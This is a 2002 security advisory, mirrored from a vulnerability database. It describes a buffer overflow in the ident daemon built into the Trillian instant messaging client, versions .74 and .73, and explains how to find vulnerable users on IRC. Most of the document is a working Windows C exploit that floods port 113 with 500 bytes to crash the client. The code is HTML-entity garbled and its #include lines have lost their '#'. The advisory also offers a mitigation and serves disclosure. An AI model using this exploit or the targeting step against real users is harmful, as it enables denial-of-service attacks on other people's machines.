Trillian .74 and below, ident flaw.

2002-09-19T00:00:00
ID SECURITYVULNS:DOC:3509
Type securityvulns
Reporter Securityvulns
Modified 2002-09-19T00:00:00

Description

Discovered:

03 September 2002 By Me, Lance Fitz-Herbert (aka phrizer).

Vulnerable Applications:

Tested On Trillian .74 and .73, But im guessing older versions are also vulnerable.

Impact:

Low-High. This could allow arbitary code to be executed on the remote victims machine, or simply used as a DoS.

Its not yet known whether this can actually be used to execute code on the machine however, if someone finds out, please let us know. :D

Details:

Trillian is a popular Instant Messageing client, which supports icq/aim/yahoo/msn and IRC. In order to connect to some IRC networks the user has to have an Identd running. Trillian incorperates an ident daemon in the client, which is susceptible to an overflow attack if enabled.

Connecting To the ident (on port 113) and sending 418 bytes will cause trillian to crash. It should be noted that trillian leaves the ident port open throughout the IRC session, an attacker would just have to connect to an IRC server and perform a '/who +u tril' and he/she would be greeted with a list of users running trillian.

Solution:

Disable Trillians Identd, and install a third party one if necessary.

DoS Example Exploit Code Follows:

/* Trillian-Ident.c Author: Lance Fitz-Herbert Contact: IRC: Phrizer, DALnet - #KORP ICQ: 23549284

Exploits the Trillian Ident Flaw. Tested On Version .74 and .73 Compiles with Borland 5.5 This Example Will Just DoS The Trillian Client.

*/

include <windows.h>

include <stdio.h>

include <stdlib.h>

char payload[500]; int main(int argc, char * argv[]) { int iret; struct hostent *host; SOCKET sockhandle; SOCKADDR_IN address; WSADATA wsdata;

    if &#40;argc&lt;2&#41; {
            printf&#40;&quot;&#92;nTrillian Ident DoS&#92;n&quot;&#41;;
            printf&#40;&quot;----------------------&#92;n&quot;&#41;;
            printf&#40;&quot;Coded By Lance Fitz-Herbert &#40;Phrizer, DALnet/#KORP&#41;&#92;n&quot;&#41;;
            printf&#40;&quot;Tested On Version .74 and .73&#92;n&#92;n&quot;&#41;;
            printf&#40;&quot;Usage: trillian-ident &lt;address&gt;&quot;&#41;;
            return 0;
    }

    WSAStartup&#40;MAKEWORD&#40;1,1&#41;,&amp;wsdata&#41;;
    printf&#40;&quot;Making Socket Now...&#92;n&quot;&#41;;
    sockhandle = socket&#40;AF_INET,SOCK_STREAM,IPPROTO_IP&#41;;

    if &#40;sockhandle == SOCKET_ERROR&#41; {
            printf&#40;&quot;Error Creating Socket&#92;n&quot;&#41;;
            WSACleanup&#40;&#41;;
            return 1;
    }

    printf&#40;&quot;Socket Created&#92;n&quot;&#41;;

    address.sin_family = AF_INET;
    address.sin_port = htons&#40;113&#41;;
    address.sin_addr.s_addr = inet_addr&#40;argv[1]&#41;;


    if &#40;address.sin_addr.s_addr == INADDR_NONE&#41; {
            host = NULL;
            printf&#40;&quot;Trying To Resolve Host&#92;n&quot;&#41;;
            host = gethostbyname&#40;argv[1]&#41;;
            if &#40;host == NULL&#41; {
                    printf&#40;&quot;Uknown Host: &#37;s&#92;n&quot;,argv[1]&#41;;
                    WSACleanup&#40;&#41;;
                    return 1;
            }
            memcpy&#40;&amp;address.sin_addr, host-&gt;h_addr_list[0],host-&gt;h_length&#41;;
    }



    printf&#40;&quot;Connecting To Server...&#92;n&quot;&#41;;
    iret = connect&#40;sockhandle, &#40;struct sockaddr *&#41; &amp;address,

sizeof(address));

    if &#40;iret == SOCKET_ERROR&#41; {
            printf&#40;&quot;Couldnt Connect&#92;n&quot;&#41;;
            WSACleanup&#40;&#41;;
            return 1;
    }

    printf&#40;&quot;Connected to &#37;s!&#92;nSending Payload&#92;n&quot;,argv[1]&#41;;
    memset&#40;payload,&#39;A&#39;,500&#41;;
    send&#40;sockhandle,payload,strlen&#40;payload&#41;,0&#41;;
    Sleep&#40;100&#41;;
    WSACleanup&#40;&#41;;
    return 0;

}

-- end code --


NOTE: Because of the amount of spam i receive, i require all emails directed to me to contain the word "nospam" in the subject line somewhere. Else i might not get your email. thankyou.



Chat with friends online, try MSN Messenger: http://messenger.msn.com